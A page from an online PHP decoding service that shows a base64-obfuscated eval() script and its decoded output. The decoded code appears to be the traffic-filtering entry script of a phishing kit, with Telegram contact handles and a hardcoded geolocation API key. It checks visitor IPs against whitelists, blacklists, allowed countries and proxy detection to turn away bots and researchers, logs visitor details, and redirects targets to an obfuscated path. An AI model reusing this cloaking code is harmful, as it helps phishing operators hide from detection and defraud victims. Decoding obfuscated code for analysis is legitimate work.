Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval("?>".base64_decode("PD9waHANCg0KICAgIC8qKi8vKiovLyoqLy8qKi8vKiovLyoqDQoNCiAgICA..

Decoded Output download

?>b'<?php

    /**//**//**//**//**//**

        Telegram : https://t.me/syst3mx
        Telegram Group : https://t.me/matos_x

    /**//**//**//**//**//**/    

    session_start();
    session_regenerate_id();

    require_once(\'inc/BrowserDetection.php\');
    require_once(\'inc/thewall.php\');
    require_once(\'infos.php\');

    function get_client_ip() {
        $client  = @$_SERVER[\'HTTP_CLIENT_IP\'];
        $forward = @$_SERVER[\'HTTP_X_FORWARDED_FOR\'];
        $remote  = $_SERVER[\'REMOTE_ADDR\'];
        if(filter_var($client, FILTER_VALIDATE_IP)) {
            $ip = $client;
        } else if(filter_var($forward, FILTER_VALIDATE_IP)) {
            $ip = $forward;
        } else {
            $ip = $remote;
        }
        if( $ip == \'::1\' ) {
            return \'127.0.0.1\';
        }
        return  $ip;
    }

    $ip = get_client_ip();

    $ip_infos = file_get_contents("https://pro.ip-api.com/php/". $ip ."?key=UO8wl6MQD2zPxmf&fields=status,message,country,countryCode,timezone,currency,isp,mobile,proxy,hosting,query");
    $ip_infos = unserialize($ip_infos);

    $_SESSION[\'currency\'] = $ip_infos[\'currency\'];
    $_SESSION[\'country\'] = $ip_infos[\'country\'];

    function visitors($detection) {
        GLOBAL $ip_infos;
        $Browser = new foroco\BrowserDetection();
        $useragent       = $_SERVER[\'HTTP_USER_AGENT\'];
        $result = $Browser->getAll($useragent, \'JSON\');
        $ip              = $ip_infos[\'query\'];
        $date            = date("Y-m-d H:i:s", time());
        $result          = json_decode($result,true);
        $os_type         = $result[\'os_type\'];
        $os_name         = $result[\'os_name\'];
        $device_type     = $result[\'device_type\'];
        $browser_name    = $result[\'browser_name\'];
        $browser_version = $result[\'browser_version\'];
        $browser_version = $result[\'browser_version\'];
        $country         = $ip_infos[\'country\'];

        $str = " <tr><th scope=\'row\'>$ip ($country)</th><td>$date</td><td>$detection</td><td>[$device_type] $browser_name $browser_version</td></tr>";
        file_put_contents(\'visitors.html\', $str  , FILE_APPEND | LOCK_EX);
    }

    $whilelist = file("whitelist.db", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if (in_array($ip, $whilelist)) {
        $_SESSION[\'last_page\'] = "index";
        $_SESSION[\'user_allowed\'] = true;
        visitors("Whitelisted");
        header("Location: qZWN0cy90YWxh/?redirection=index");
        exit();
    }

    $blacklist = file("blacklist.db", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if (in_array($ip, $blacklist)) {
        visitors("Blacklisted");
        header("Location:" . $conf_redirect_bot);
        exit();
    }

    if( count(ALLOWED_COUNTRIES) > 0 ) {
        if( !in_array($ip_infos[\'countryCode\'],$conf_allowed_countries) ) {
            visitors("Country not allowed");
            header("Location:" . REDIRECT_BOTS);
            exit();
        }
    }

    if( get_client_ip() == "127.0.0.1" ) {
        $_SESSION[\'last_page\'] = "index";
        $_SESSION[\'user_allowed\'] = true;
        visitors("Localhost");
        header("Location: qZWN0cy90YWxh/?redirection=index");
        exit();
    }

    if( $ip_infos[\'status\'] == "success" ) {

        if( $ip_infos[\'proxy\'] == true ) {
            visitors("Detected as bot");
            header("Location:" . $conf_redirect_bot);
            exit();
        }

        $_SESSION[\'last_page\'] = "index";
        $_SESSION[\'user_allowed\'] = true;
        visitors("Allowed");
        header("Location: qZWN0cy90YWxh/?redirection=index");
        exit();

    } else {
        visitors("Not Allowed");
        header("Location:" . REDIRECT_BOTS);
        exit();
    }

?>'

Did this file decode correctly?

Original Code

<?php eval("?>".base64_decode("PD9waHANCg0KICAgIC8qKi8vKiovLyoqLy8qKi8vKiovLyoqDQoNCiAgICAgICAgVGVsZWdyYW0gOiBodHRwczovL3QubWUvc3lzdDNteA0KICAgICAgICBUZWxlZ3JhbSBHcm91cCA6IGh0dHBzOi8vdC5tZS9tYXRvc194DQoNCiAgICAvKiovLyoqLy8qKi8vKiovLyoqLy8qKi8gICAgDQoNCiAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgc2Vzc2lvbl9yZWdlbmVyYXRlX2lkKCk7DQoNCiAgICByZXF1aXJlX29uY2UoJ2luYy9Ccm93c2VyRGV0ZWN0aW9uLnBocCcpOw0KICAgIHJlcXVpcmVfb25jZSgnaW5jL3RoZXdhbGwucGhwJyk7DQogICAgcmVxdWlyZV9vbmNlKCdpbmZvcy5waHAnKTsNCg0KICAgIGZ1bmN0aW9uIGdldF9jbGllbnRfaXAoKSB7DQogICAgICAgICRjbGllbnQgID0gQCRfU0VSVkVSWydIVFRQX0NMSUVOVF9JUCddOw0KICAgICAgICAkZm9yd2FyZCA9IEAkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9GT1InXTsNCiAgICAgICAgJHJlbW90ZSAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsNCiAgICAgICAgaWYoZmlsdGVyX3ZhcigkY2xpZW50LCBGSUxURVJfVkFMSURBVEVfSVApKSB7DQogICAgICAgICAgICAkaXAgPSAkY2xpZW50Ow0KICAgICAgICB9IGVsc2UgaWYoZmlsdGVyX3ZhcigkZm9yd2FyZCwgRklMVEVSX1ZBTElEQVRFX0lQKSkgew0KICAgICAgICAgICAgJGlwID0gJGZvcndhcmQ7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAkaXAgPSAkcmVtb3RlOw0KICAgICAgICB9DQogICAgICAgIGlmKCAkaXAgPT0gJzo6MScgKSB7DQogICAgICAgICAgICByZXR1cm4gJzEyNy4wLjAuMSc7DQogICAgICAgIH0NCiAgICAgICAgcmV0dXJuICAkaXA7DQogICAgfQ0KDQogICAgJGlwID0gZ2V0X2NsaWVudF9pcCgpOw0KDQogICAgJGlwX2luZm9zID0gZmlsZV9nZXRfY29udGVudHMoImh0dHBzOi8vcHJvLmlwLWFwaS5jb20vcGhwLyIuICRpcCAuIj9rZXk9VU84d2w2TVFEMnpQeG1mJmZpZWxkcz1zdGF0dXMsbWVzc2FnZSxjb3VudHJ5LGNvdW50cnlDb2RlLHRpbWV6b25lLGN1cnJlbmN5LGlzcCxtb2JpbGUscHJveHksaG9zdGluZyxxdWVyeSIpOw0KICAgICRpcF9pbmZvcyA9IHVuc2VyaWFsaXplKCRpcF9pbmZvcyk7DQoNCiAgICAkX1NFU1NJT05bJ2N1cnJlbmN5J10gPSAkaXBfaW5mb3NbJ2N1cnJlbmN5J107DQogICAgJF9TRVNTSU9OWydjb3VudHJ5J10gPSAkaXBfaW5mb3NbJ2NvdW50cnknXTsNCg0KICAgIGZ1bmN0aW9uIHZpc2l0b3JzKCRkZXRlY3Rpb24pIHsNCiAgICAgICAgR0xPQkFMICRpcF9pbmZvczsNCiAgICAgICAgJEJyb3dzZXIgPSBuZXcgZm9yb2NvXEJyb3dzZXJEZXRlY3Rpb24oKTsNCiAgICAgICAgJHVzZXJhZ2VudCAgICAgICA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiAgICAgICAgJHJlc3VsdCA9ICRCcm93c2VyLT5nZXRBbGwoJHVzZXJhZ2VudCwgJ0pTT04nKTsNCiAgICAgICAgJGlwICAgICAgICAgICAgICA9ICRpcF9pbmZvc1sncXVlcnknXTsNCiAgICAgICAgJGRhdGUgICAgICAgICAgICA9IGRhdGUoIlktbS1kIEg6aTpzIiwgdGltZSgpKTsNCiAgICAgICAgJHJlc3VsdCAgICAgICAgICA9IGpzb25fZGVjb2RlKCRyZXN1bHQsdHJ1ZSk7DQogICAgICAgICRvc190eXBlICAgICAgICAgPSAkcmVzdWx0Wydvc190eXBlJ107DQogICAgICAgICRvc19uYW1lICAgICAgICAgPSAkcmVzdWx0Wydvc19uYW1lJ107DQogICAgICAgICRkZXZpY2VfdHlwZSAgICAgPSAkcmVzdWx0WydkZXZpY2VfdHlwZSddOw0KICAgICAgICAkYnJvd3Nlcl9uYW1lICAgID0gJHJlc3VsdFsnYnJvd3Nlcl9uYW1lJ107DQogICAgICAgICRicm93c2VyX3ZlcnNpb24gPSAkcmVzdWx0Wydicm93c2VyX3ZlcnNpb24nXTsNCiAgICAgICAgJGJyb3dzZXJfdmVyc2lvbiA9ICRyZXN1bHRbJ2Jyb3dzZXJfdmVyc2lvbiddOw0KICAgICAgICAkY291bnRyeSAgICAgICAgID0gJGlwX2luZm9zWydjb3VudHJ5J107DQoNCiAgICAgICAgJHN0ciA9ICIgPHRyPjx0aCBzY29wZT0ncm93Jz4kaXAgKCRjb3VudHJ5KTwvdGg+PHRkPiRkYXRlPC90ZD48dGQ+JGRldGVjdGlvbjwvdGQ+PHRkPlskZGV2aWNlX3R5cGVdICRicm93c2VyX25hbWUgJGJyb3dzZXJfdmVyc2lvbjwvdGQ+PC90cj4iOw0KICAgICAgICBmaWxlX3B1dF9jb250ZW50cygndmlzaXRvcnMuaHRtbCcsICRzdHIgICwgRklMRV9BUFBFTkQgfCBMT0NLX0VYKTsNCiAgICB9DQoNCiAgICAkd2hpbGVsaXN0ID0gZmlsZSgid2hpdGVsaXN0LmRiIiwgRklMRV9JR05PUkVfTkVXX0xJTkVTIHwgRklMRV9TS0lQX0VNUFRZX0xJTkVTKTsNCiAgICBpZiAoaW5fYXJyYXkoJGlwLCAkd2hpbGVsaXN0KSkgew0KICAgICAgICAkX1NFU1NJT05bJ2xhc3RfcGFnZSddID0gImluZGV4IjsNCiAgICAgICAgJF9TRVNTSU9OWyd1c2VyX2FsbG93ZWQnXSA9IHRydWU7DQogICAgICAgIHZpc2l0b3JzKCJXaGl0ZWxpc3RlZCIpOw0KICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiBxWldOMGN5OTBZV3hoLz9yZWRpcmVjdGlvbj1pbmRleCIpOw0KICAgICAgICBleGl0KCk7DQogICAgfQ0KDQogICAgJGJsYWNrbGlzdCA9IGZpbGUoImJsYWNrbGlzdC5kYiIsIEZJTEVfSUdOT1JFX05FV19MSU5FUyB8IEZJTEVfU0tJUF9FTVBUWV9MSU5FUyk7DQogICAgaWYgKGluX2FycmF5KCRpcCwgJGJsYWNrbGlzdCkpIHsNCiAgICAgICAgdmlzaXRvcnMoIkJsYWNrbGlzdGVkIik7DQogICAgICAgIGhlYWRlcigiTG9jYXRpb246IiAuICRjb25mX3JlZGlyZWN0X2JvdCk7DQogICAgICAgIGV4aXQoKTsNCiAgICB9DQoNCiAgICBpZiggY291bnQoQUxMT1dFRF9DT1VOVFJJRVMpID4gMCApIHsNCiAgICAgICAgaWYoICFpbl9hcnJheSgkaXBfaW5mb3NbJ2NvdW50cnlDb2RlJ10sJGNvbmZfYWxsb3dlZF9jb3VudHJpZXMpICkgew0KICAgICAgICAgICAgdmlzaXRvcnMoIkNvdW50cnkgbm90IGFsbG93ZWQiKTsNCiAgICAgICAgICAgIGhlYWRlcigiTG9jYXRpb246IiAuIFJFRElSRUNUX0JPVFMpOw0KICAgICAgICAgICAgZXhpdCgpOw0KICAgICAgICB9DQogICAgfQ0KDQogICAgaWYoIGdldF9jbGllbnRfaXAoKSA9PSAiMTI3LjAuMC4xIiApIHsNCiAgICAgICAgJF9TRVNTSU9OWydsYXN0X3BhZ2UnXSA9ICJpbmRleCI7DQogICAgICAgICRfU0VTU0lPTlsndXNlcl9hbGxvd2VkJ10gPSB0cnVlOw0KICAgICAgICB2aXNpdG9ycygiTG9jYWxob3N0Iik7DQogICAgICAgIGhlYWRlcigiTG9jYXRpb246IHFaV04wY3k5MFlXeGgvP3JlZGlyZWN0aW9uPWluZGV4Iik7DQogICAgICAgIGV4aXQoKTsNCiAgICB9DQoNCiAgICBpZiggJGlwX2luZm9zWydzdGF0dXMnXSA9PSAic3VjY2VzcyIgKSB7DQoNCiAgICAgICAgaWYoICRpcF9pbmZvc1sncHJveHknXSA9PSB0cnVlICkgew0KICAgICAgICAgICAgdmlzaXRvcnMoIkRldGVjdGVkIGFzIGJvdCIpOw0KICAgICAgICAgICAgaGVhZGVyKCJMb2NhdGlvbjoiIC4gJGNvbmZfcmVkaXJlY3RfYm90KTsNCiAgICAgICAgICAgIGV4aXQoKTsNCiAgICAgICAgfQ0KDQogICAgICAgICRfU0VTU0lPTlsnbGFzdF9wYWdlJ10gPSAiaW5kZXgiOw0KICAgICAgICAkX1NFU1NJT05bJ3VzZXJfYWxsb3dlZCddID0gdHJ1ZTsNCiAgICAgICAgdmlzaXRvcnMoIkFsbG93ZWQiKTsNCiAgICAgICAgaGVhZGVyKCJMb2NhdGlvbjogcVpXTjBjeTkwWVd4aC8/cmVkaXJlY3Rpb249aW5kZXgiKTsNCiAgICAgICAgZXhpdCgpOw0KDQogICAgfSBlbHNlIHsNCiAgICAgICAgdmlzaXRvcnMoIk5vdCBBbGxvd2VkIik7DQogICAgICAgIGhlYWRlcigiTG9jYXRpb246IiAuIFJFRElSRUNUX0JPVFMpOw0KICAgICAgICBleGl0KCk7DQogICAgfQ0KDQo/Pg==")); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 23ade01cbf344d1c667b4d6116eaee10
Eval Count 1
Decode Time 41 ms